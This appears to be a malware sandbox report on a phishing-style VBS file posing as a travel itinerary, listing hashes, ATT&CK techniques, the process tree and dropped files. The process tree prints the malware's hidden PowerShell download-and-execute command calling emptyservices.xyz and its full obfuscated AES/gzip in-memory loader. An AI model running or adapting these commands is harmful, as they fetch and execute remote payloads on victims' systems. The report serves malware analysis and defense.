f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6

General

Target

Round Trip Itinerary details.vbs
Size

78KB
MD5

ab631b79a8f6cc0f48e17765c33c8fee
SHA1

539298c574b25b70379fccd8c47c3dbee5184877
SHA256

f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6
SHA512

0e5818d2c4eca342c7b8ece7c8f14028e34d00e2c83f0d3c72ceaeb0380fc568ceb02df8e5743b9a691d85cc462863bceb68ccb1cf499994fe0e523debe6e550
SSDEEP

1536:rtYq5Mv5eaBf+kvAQKCidRC0Xe6Tw/LP5KU52t+gN4:lmRea3vAWGOyZsu4

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2656	powershell.exe
2584	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2656	powershell.exe
2584	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 2656	2360	WScript.exe	32
PID 2360 wrote to memory of 2656	2360	WScript.exe	32
PID 2360 wrote to memory of 2656	2360	WScript.exe	32
PID 2360 wrote to memory of 2740	2360	WScript.exe	34
PID 2360 wrote to memory of 2740	2360	WScript.exe	34
PID 2360 wrote to memory of 2740	2360	WScript.exe	34
PID 2740 wrote to memory of 2576	2740	cmd.exe	36
PID 2740 wrote to memory of 2576	2740	cmd.exe	36
PID 2740 wrote to memory of 2576	2740	cmd.exe	36
PID 2740 wrote to memory of 2584	2740	cmd.exe	37
PID 2740 wrote to memory of 2584	2740	cmd.exe	37
PID 2740 wrote to memory of 2584	2740	cmd.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Round Trip Itinerary details.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xZeq9DIcMp8T9I70bsZRE1uAqlMKnnwxo9STrCb0BJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wSiqGPKdEt2A2oq502N0Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WbLZH=New-Object System.IO.MemoryStream(,$param_var); $YROuh=New-Object System.IO.MemoryStream; $FnRtc=New-Object System.IO.Compression.GZipStream($WbLZH, [IO.Compression.CompressionMode]::Decompress); $FnRtc.CopyTo($YROuh); $FnRtc.Dispose(); $WbLZH.Dispose(); $YROuh.Dispose(); $YROuh.ToArray();}function execute_function($param_var,$param2_var){ $JFUbC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vIQTp=$JFUbC.EntryPoint; $vIQTp.Invoke($null, $param2_var);}$LMlhd = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $LMlhd;$qwcXI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LMlhd).Split([Environment]::NewLine);foreach ($RYDhX in $qwcXI) { if ($RYDhX.StartsWith('qSryZxtgHRJoDBkXgCTa')) { $MiSte=$RYDhX.Substring(20); break; }}$payloads_var=[string[]]$MiSte.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
9a7ec81cc371860d03b51764e8eade97

SHA1
3a22f9120587dc2fc84765efde70586fd0775fdf

SHA256
20a77dbb7b4438cc9cfa45e1a3de33b7100b039ca7f8838a12d09273f55dbe3e

SHA512
9d3a4c525b0f811ab9fb57787c16ce32dcba714fea558c5f3364703a20f232ece58a83c0edf3294a62d92ce52b3878f50f1c30ef6687d1e37e855f0f069331bb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0M1Z8QTL70OISN2GHW7R.temp

Filesize
7KB

MD5
4147795e9f017869f4bd7af18a7ae96b

SHA1
0be4273e6c89039d4f3b212dd31ac81acbfd0386

SHA256
4e909647b28e0df955c6ae980cf11e4f4afb1ff92d1f83f9239d3814691a3168

SHA512
0eec1bc767d3374a8986d94460c8e27ef606e7bdb5c858148fd39f31c3a942c1c004c759f4163245d0c2feed04e5fa64ccd0745186ea1d419c95670bb890d3a8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
54f9a058745a69caa5f517fcb11e30ca

SHA1
562e07d9c65c93b18c49aed9938712b19939129f

SHA256
6d6e428ac94c5818f867d91a88da21332f2c460e0c30b9c2993bb60c01525050

SHA512
1bce803c459139d2e575c550c31caa681126158a253e67d76d134b330a2195d1cf8abdd03693791db6ac78ab6654f17f762b8a20c9358affff785159ed0cb51b

Download Submit
memory/2584-25-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2584-26-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2656-4-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

Filesize
4KB

Download
memory/2656-5-0x000000001B4B0000-0x000000001B792000-memory.dmp

Filesize
2.9MB

Download
memory/2656-6-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2656-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2656-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2656-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download
memory/2656-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing